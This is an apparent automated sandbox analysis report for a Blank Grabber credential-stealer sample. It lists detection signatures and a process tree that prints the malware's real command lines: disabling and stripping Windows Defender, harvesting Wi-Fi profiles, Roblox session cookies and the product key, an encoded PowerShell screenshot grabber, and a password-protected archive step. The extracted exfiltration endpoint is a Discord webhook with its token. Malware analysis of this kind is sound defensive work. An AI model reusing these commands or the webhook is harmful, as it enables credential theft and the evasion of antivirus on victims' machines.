Windows Analysis Report
HeilHitler.exe

Overview

General Information

Sample name: HeilHitler.exe
Analysis ID: 1556385
MD5: aeab677edfb0b7838ad440c071a04965
SHA1: 9855bbfe1e4d729853c1d3fd5e51a6d767cf8203
SHA256: e465cccde051595262dc76359e4a06279341b4292901a49061cf9fa1386119df
Tags: BlankGrabber, exe, user-likeastar20

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • HeilHitler.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\HeilHitler.exe" MD5: AEAB677EDFB0B7838AD440C071A04965)
    • HeilHitler.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\HeilHitler.exe" MD5: AEAB677EDFB0B7838AD440C071A04965)
      • cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 2008 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • powershell.exe (PID: 7600 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7504 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7608 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7580 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7796 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7960 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7812 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7968 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7212 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8080 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7232 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8100 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7208 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 2148 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5216 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 1928 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 5416 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 600 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8084 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 5064 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7884 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D0C.tmp" "c:\Users\user\AppData\Local\Temp\0qdpbrpq\CSC1A48FA887436480A8B41407A32798B3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 824 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 1012 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 5940 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8072 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7692 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8028 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 1704 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7512 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5228 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 4996 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5300 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7656 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3288 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 1848 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7640 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7920 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 3400 cmdline: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8092 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5696 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7224 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7712 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1928 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6024 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5164 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7864 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8160 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7736 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1302413781162266715/WJ0cdpWb68IO94MZWMtc7o2HkgZFWYLoExtrMC3fyimxUgR5SCyIRovGkrea9pNRE2_V"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_MEI74322\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1680543056.0000028B92082000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000003.1680543056.0000028B92084000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000003.2017807345.000001BD43E2A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HeilHitler.exe", ParentImage: C:\Users\user\Desktop\HeilHitler.exe, ParentProcessId: 7448, ParentProcessName: HeilHitler.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", ProcessId: 7496, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HeilHitler.exe", ParentImage: C:\Users\user\Desktop\HeilHitler.exe, ParentProcessId: 7448, ParentProcessName: HeilHitler.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7504, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HeilHitler.exe", ParentImage: C:\Users\user\Desktop\HeilHitler.exe, ParentProcessId: 7448, ParentProcessName: HeilHitler.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *", ProcessId: 7920, ProcessName: cmd.exe
